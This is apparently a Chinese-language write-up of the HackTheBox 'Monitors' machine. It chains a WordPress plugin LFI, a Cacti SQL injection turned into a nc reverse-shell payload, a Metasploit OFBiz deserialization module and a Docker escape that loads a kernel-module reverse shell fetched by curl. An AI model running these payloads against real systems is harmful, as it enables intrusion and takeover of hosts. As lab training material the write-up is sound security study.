基本信息
data:image/s3,"s3://crabby-images/c09d1/c09d1ee5278b8aafec3a121f22e1dc53bca9d12d" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.10.238 |
80
直接ip访问是错误页面,加hosts后访问是一个wordpress:
data:image/s3,"s3://crabby-images/08ee2/08ee21d3f60402c9606dfbcb4c5f2615bf87820a" alt=""
data:image/s3,"s3://crabby-images/9aa87/9aa8766e6094660f7a41f4fd0cafedb951c613e0" alt=""
wordpress
wpscan
wordpress那就wpscan,发现一个存在漏洞的插件:
- WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion - PHP webapps Exploit
https://www.exploit-db.com/exploits/44544
data:image/s3,"s3://crabby-images/37fab/37fab60ccb9f5a9a62a48e5161f11c4d6d654e9f" alt=""
lfi
测试发现只能利用lfi,rfi不解析执行:
data:image/s3,"s3://crabby-images/82ffe/82ffe0815e197be104529e6527b8f44bef0c5522" alt=""
data:image/s3,"s3://crabby-images/2a065/2a065630c9715ec9f0dcc63d5c3ca5d8e6fc911e" alt=""
log
log里得到另一个域名:
(更新,看ippsec视频是读的apache 配置文件得到vhost,这个log可能是别人访问后的结果)
1 | http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//proc/self/fd/10 |
wp-config.php
lfi读wp-config得到密码:
1 | view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php |
data:image/s3,"s3://crabby-images/c234d/c234d92339a423d876972c68bfccabd952d93eaf" alt=""
cacti
cacti的域名加hosts后访问,密码就是wp-config里得到的密码,Version 1.2.12:
data:image/s3,"s3://crabby-images/17287/17287781df68f476d434988af87d84845323c3a5" alt=""
data:image/s3,"s3://crabby-images/77b15/77b15ccc6d3128d7a95f0d48a1a913fb622cd00f" alt=""
sql注入
搜到相关漏洞:
- SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295) · Issue #3622 · Cacti/cacti
https://github.com/Cacti/cacti/issues/3622
1 | http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=')union select 1,username,password,4,5,6,7 from user_auth;--+- |
data:image/s3,"s3://crabby-images/b437a/b437aba43637e9908cf47c3427357759d3e8981a" alt=""
rce
同样是根据GitHub那个issue,sqli to rce,第一个请求更改设置,第二个请求触发reverse shell:
1 | http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.4+4444+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+- |
data:image/s3,"s3://crabby-images/83ebb/83ebbce1365c841b8a764768a5305502741860d4" alt=""
marcus
用户目录只有marcus, 所以查看和他相关的文件内容:
1 | grep 'marcus' /etc -R 2>/dev/null |
发现cacti-backup.service执行backup.sh
backup
查看两个文件,得到密码:
1 | www-data@monitors:/home/marcus$ cat /etc/systemd/system/cacti-backup.service |
user flag
这个密码就是marcus用户密码,ssh登录,得到user.txt:
data:image/s3,"s3://crabby-images/2be6e/2be6e29449acc3d7f53fb870e42c317028661e21" alt=""
信息
查看端口发现8443开在本地,转发出来访问:
1 | ssh -L 8443:127.0.0.1:8443 marcus@monitors.htb |
data:image/s3,"s3://crabby-images/1f316/1f3162512bcca64c629fe323d3c4d675fdfffebf" alt=""
tomcat 9.0.31
data:image/s3,"s3://crabby-images/40bfd/40bfd5c47ccecd63ba7eac8515156376aff47ea7" alt=""
CVE-2020-9496
msf有模块一键打:
1 | use linux/http/apache_ofbiz_deserialiation |
打到docker root:
data:image/s3,"s3://crabby-images/9b5b1/9b5b1f46409ac5eb774ea41ee94b9d5482636702" alt=""
docker逃逸
docker容器和宿主机共享内核模块,发现有cap_sys_module:
1 | capsh --print |
data:image/s3,"s3://crabby-images/1363c/1363c2cef0a095437aefd3a57c3a7ac7b90674c4" alt=""
sys_module
1 | curl http://10.10.14.4/reverse-shell.c -O /tmp/reverse-shell.c |
data:image/s3,"s3://crabby-images/36250/36250bf4ecd0f85626afe423ff93e605b100aa6f" alt=""
data:image/s3,"s3://crabby-images/babc3/babc3ffb29eac7ae49c6f4c77fd4d69cdb4aa941" alt=""
reverse-shell.c
注意ip是外部宿主机:
1 |
|
Makefile
1 | obj-m +=reverse-shell.o |
root flag
加载内核模块后,宿主机得到root shell:
data:image/s3,"s3://crabby-images/96e11/96e11ad2703ac804890145f9d40e3cd929d4b630" alt=""
参考资料
- WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion - PHP webapps Exploit
https://www.exploit-db.com/exploits/44544 - SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295) · Issue #3622 · Cacti/cacti
https://github.com/Cacti/cacti/issues/3622 - Docker Container Breakout: Abusing SYS_MODULE capability! | by Nishant Sharma | Pentester Academy Blog
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd - Monitors: user part for free | RaidForums
https://raidforums.com/Thread-Tutorial-Monitors-user-part-for-free - Monitors: root part for free | RaidForums
https://raidforums.com/Thread-Tutorial-Monitors-root-part-for-free - HackTheBox - Monitors - YouTube
https://www.youtube.com/watch?v=-loZwD39ifc&ab_channel=IppSec